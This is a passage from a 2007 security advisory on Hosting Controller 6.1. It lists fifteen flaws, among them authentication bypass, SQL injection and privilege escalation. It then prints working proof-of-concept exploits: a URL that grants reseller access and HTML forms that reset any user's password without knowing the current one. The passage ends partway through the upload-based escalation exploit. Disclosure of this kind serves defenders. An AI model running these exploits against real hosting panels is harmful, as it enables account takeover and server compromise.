hc-multi.txt
Posted on 14 December 2007
Title: Multiple Security Bugs In Hosting Controller Critical: Extremely critical Impact: Full system administrator access Vendor: Hosting Controller Version: 6.1 Hot fix <= 3.3 Vendor URL: www.hostingcontroller.com Solution: N/A From company - There is temporary solution in this report Exploit: Available Release Date: 2007 - December Credit: www.BugReport.ir #################### - Discussion: #################### 1- [Remote Attacker] can login to hosting controller Panel. He can also change all others' passwords. 2- [User] can copy a file to hosting controller web directory which is executed under administrative privilege, so attacker can execute his commands by administrative privilege. e.g. an attacker can gain remote desktop of server using this bug and uploading an ASP file! 3- [Remote Attacker] can make a new user. 4- [Remote Attacker] can change all user's profiles. 5- [User] can see all the database information by a SQL injection. 6- [User] can change his credit amount or increase his discount. 7- [User] can uninstall other's FrontPage extensions. 8- [User] can delete all of gateway information. 9- [User] can enable or disable pay type. 10- [[User] can see all usernames in the server by "fp2000/NEWSRVR.asp". 11- [User] can find Hosting Controller setup directory. 12- [User] can import unwanted plan or change the plans. 13- [Remote Attacker] can find web site path. 14- [Remote Attacker] can enable or disable all Hosting Controller forums by SQL Injection. 15- [User] can change other's host headers. [Remote attacker] = (Unauthorized user without any permission or access.) [User] = (A user with a simple account.) #################### - Exploits: (or POCs) #################### \\\\\\\\\\\n///////////////////// 1- [Remote Attacker] can login to hosting controller Panel. He can also change all others' passwords: 1.1- http://[HC URL]/hosting/addreseller.asp?reseller=[USERNAME] -> for ex. [USERNAME]= resadmin 1.2- Now, to login without changing the password, attacker must run "ChangeDisplay.htm" then redirect to "main.asp" ~~~~~~~~~~~~~~~~1.2.1 ChangeDisplay.htm~~~~~~~~~~~~~~~~~~~~~~~~ <script> function check(){ _action = '/AdminSettings/displays.asp?DecideAction=1&ChangeSkin=1' frmDisplay.action = window.document.all.URL.value + _action return true; } </script> URL: <input type="text" name="URL" /> <form name="frmDisplay" action="" method="post" onsubmit="return check()"> <input type="hidden" name="TemplateSkin" value="PanelXP/Blue" /> <input type="submit" /> </form> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1.3- Attacker, also can change username's password without having current password by "ChangePass.htm" ~~~~~~~~~~~~~~~~1.3.1 ChangePass.htm~~~~~~~~~~~~~~~~~~~~~~~~ <script> function check(){ _action = '/Accounts/AccountActions.asp?ActionType=UpdateUser' frmChangePass.action = window.document.all.URL.value + _action return true; } </script> URL: <input type="text" name="URL" /><br /> <form name="frmChangePass" action="" method="post" onsubmit="return check()"> UserName: <input type="text" name="UserName" value="[USERNAME]" /> <br /> FullName: <input type="text" name="FullName" value="[USERNAME]" /> <br /> Description: <input type="text" name="Description" value="Something" /> <br /> Password: <input type="text" name="Pass1" value="" /> <br /> Confirm Password: <input type="text" name="ConfPass" value="" /> <br /> <input type="hidden" name="DefaultDiscount" value="0" /> <input type="hidden" name="CreditLimit" value="0" /> <input type="hidden" name="ActionType" value="AddUser" /> <input type="hidden" name="PassCheck" value="TRUE" /> <input type="submit" /> </form> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \\\\\\\\\\\n///////////////////// 2- [User] can copy a file to hosting controller web directory which is executed under administrator's privilege, so attacker can execute his commands by administrator's privilege. For example attacker can gain remote desktop of server by this way and uploading an ASP file! This bug is because of "inc_newuser.asp" that can set full control permission on each "db","www","Special", or "log" directory on the server. This part is more complicated than the others, so we describe it more too. 2.1- We have a username, for ex.